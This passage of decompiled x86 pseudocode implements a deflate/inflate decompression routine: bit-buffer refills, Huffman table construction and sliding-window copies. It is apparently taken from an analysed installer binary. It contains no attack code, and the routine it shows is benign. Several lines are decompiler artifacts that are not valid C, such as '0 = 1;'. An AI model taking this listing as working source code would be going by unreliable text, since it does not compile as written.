				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406AC3( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4073e8; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4073e8; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42dbb8;
												if( *0x42dbb8 != 0) {
													L22:
													_t412 =  *0x40942c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x409430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42ca34; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42ca30; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42ca38;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42ceb8;
													if(_t416 < 0x42ceb8) {
														L15:
														__eflags = _t416 - 0x42cc74;
														_t438 = 8;
														if(_t416 > 0x42cc74) {
															__eflags = _t416 - 0x42ce38;
															if(_t416 >= 0x42ce38) {
																__eflags = _t416 - 0x42ce98;
																if(_t416 < 0x42ce98) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42ca38, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42ca38 + _t440;
														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
														 *0x42dbb8 =  *0x42dbb8 + 1;
														__eflags =  *0x42dbb8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
